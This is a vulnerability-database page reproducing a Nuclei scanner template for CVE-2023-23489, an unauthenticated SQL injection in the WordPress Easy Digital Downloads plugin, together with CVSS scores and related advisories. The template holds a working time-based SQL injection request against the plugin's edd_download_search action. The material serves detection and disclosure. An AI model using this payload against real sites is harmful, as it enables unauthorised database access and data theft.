Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-23489HistoryFeb 12, 2023 - 7:21 a.m.
WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection
2023-02-1207:21:47
ProjectDiscovery
github.com
5
wordpress
easy digital downloads
sql injection
unauth
wpscan
sqli
tenable
sandhillsdev
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.118 Low
EPSS
Percentile
95.4%
WordPress Easy Digital Downloads plugin 3.1.0.2 and 3.1.0.3 contains a SQL injection vulnerability in the s parameter of its edd_download_search action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
id: CVE-2023-23489
info:
name: WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress Easy Digital Downloads plugin 3.1.0.2 and 3.1.0.3 contains a SQL injection vulnerability in the s parameter of its edd_download_search action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
remediation: |
Update to the latest version of Easy Digital Downloads plugin (3.1.0.4 or higher) to mitigate the SQL Injection vulnerability.
reference:
- https://wpscan.com/vulnerability/c5a6830c-6420-42fc-b20c-8e20224d6f18
- https://wordpress.org/plugins/easy-digital-downloads/
- https://www.tenable.com/security/research/tra-2023-2
- https://nvd.nist.gov/vuln/detail/CVE-2023-23489
- https://github.com/JoshuaMart/JoshuaMart
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-23489
cwe-id: CWE-89
epss-score: 0.11793
epss-percentile: 0.95309
cpe: cpe:2.3:a:sandhillsdev:easy_digital_downloads:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: sandhillsdev
product: easy_digital_downloads
framework: wordpress
tags: cve,cve2023,easy-digital-downloads,unauth,wpscan,wordpress,wp,wp-plugin,sqli,tenable,sandhillsdev
http:
- raw:
- |
@timeout: 10s
GET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration_1>=6'
- 'status_code_1 == 200'
- 'contains(body_1, "[]") && contains(body_2, "Easy Digital Downloads")'
condition: and
# digest: 4a0a00473045022100ce855e670e183a3c0c3f09471253246615d2b5faf6c6e9d1156669c259f16abe02202d77885086d1d097ed3172a6980ca5784d9c874d2bd06d38c32e8128a197e0a3:922c64590222798bb761d5b6d8e72950Related
wpvulndb
wpvulndb
Easy Digital Downloads 3.1.0.2 & 3.1.0.3 - Unauthenticated SQLi
2023-01-12 00:00:00
nvd
nvd
CVE-2023-23489
2023-01-20 18:15:10
wpexploit
wpexploit
Easy Digital Downloads 3.1.0.2 & 3.1.0.3 - Unauthenticated SQLi
2023-01-12 00:00:00
cve
cve
CVE-2023-23489
2023-01-20 18:15:10
openvas
openvas
WordPress Easy Digital Downloads Plugin 3.1.0.2 - 3.1.0.3 SQLi Vulnerability
2023-09-05 00:00:00
cvelist
cvelist
CVE-2023-23489
2023-01-20 00:00:00
prion
prion
Sql injection
2023-01-20 18:15:00
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.118 Low
EPSS
Percentile
95.4%
Related for NUCLEI:CVE-2023-23489